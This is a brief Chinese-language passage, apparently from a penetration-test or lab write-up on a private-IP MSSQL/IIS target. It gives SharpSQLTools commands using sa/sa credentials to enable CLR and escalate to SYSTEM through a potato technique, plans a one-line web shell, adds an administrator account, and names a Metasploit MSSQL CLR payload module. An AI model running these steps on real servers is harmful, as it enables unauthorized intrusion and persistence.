ok
目标是 iis,那么想办法找到 iis 到目录写个一句话吧。
一般 iis 的目录是:C:\inetpub\wwwroot,那么查看下是否存在:
存在是存在 但是不能写文件
使用 SharpSQLTools 开启目标 clr:
SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami
然后启用并调用命令:
SharpSQLTools.exe 10.10.10.18 sa sa master enable_clrSharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami这下子就是一个系统权限了!
随后添加了一个管理员:
但还是不能写一句话
还是用 MSF 把:
exploit/windows/mssql/mssql_clr_payload